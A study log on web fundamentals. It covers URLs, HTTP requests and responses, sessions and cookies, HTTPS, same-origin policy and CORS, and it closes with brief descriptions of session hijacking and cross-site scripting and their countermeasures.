This log covers HTTP requests, responses, stateful web application and security.
A URL is like that address or phone number you need in order to visit or communicate with your friend. 1
URL is the frequently used part of Uniform Resource Identifier (URI).
A URL (
http://www.example.com:88/home?item=book) can break into 5 parts,
- Port (HTTP default port is
- URL Path,
- Query String Parameters,
A full list of HTTP request method definitions can be found at w3.org.
GET, used to retrieve a resource. There are size and security limitations to using
GET request but the response can be anything.
POST, used to send data to a server or initiate action on the server. It can be used to send larger (image/video) and sensitive data (username/password) to the server.
The data send via
POST request is contained in HTTP body. The body contains the data that is being transmitted in an HTTP message.
HTTP headers contains additional information during the request/response HTTP cycle. Headers are column-separated name-value pairs in plain text. Common request header fields are
Response is data returned by the server.
HTTP Status code, a three-digit number that the server sends back after receiving a request.
A full list of HTTP Status code can be found at w3.org.
Common HTTP Status code are
404 (Not Found),
500 (Internal Server Error), and
302 (Found/Redirect), re-route the request from the original URL to a new URL.
Like request header, response header provide additional information about the resource being sent.
Stateful Web Application
Server send a Session identifier (unique token) to client after authenticated. Whenever a client makes a request to the server, the client appends the token as part of the request. Passing unique token creates persistent connection between requests.
Things has to be done by server to use session,
- Every request must be inspected to see if it contains a session ID
- Verify session ID, compare with stored session data
- Retrieve the session data based on the session ID
- Recreate the application state
A cookie is data that’s sent from the server and stored in the client during a request/response cycle.
The client side cookie is compared with the server-side session data on each request to identify the current session.
Session ID is stored on the client, and it is used as a key to the session data stored server side.
Both requests and responses are being sent as strings. Hackers can employ packet sniffing to read the messages.
Every request/response is encrypted before being transported on the network with HTTPS. HTTPS sends message via TLS (a cryptographic protocol) for encryption.
Same-origin policy precents scripts from one site from manipulating documents from another site. It is an important guard against session hijacking. Documents in the same origin have the same,
- Port number
Cross-origin resource sharing (CORS) is a mechanism allows resources from one domain to be requested from another domain. CORS works by adding new HTTP headers.
Session ID is stored on browser when username/password match. Both the attacker and user share the same session and can access the web application when attacker gets the session ID.
Countermeasures for session hijacking are,
- Reseting sessions by creating new ID for every successful login
- Setting an expiration time on sessions
- Use HTTPS across the entire app
Cross-Site Scripting (XSS)
Malicious code would by pass the same-origin policy because the code lives on the site.
Countermeasures for XSS are,
- Always sanitize user input, eliminate problematic input
- Escape all user input data when displaying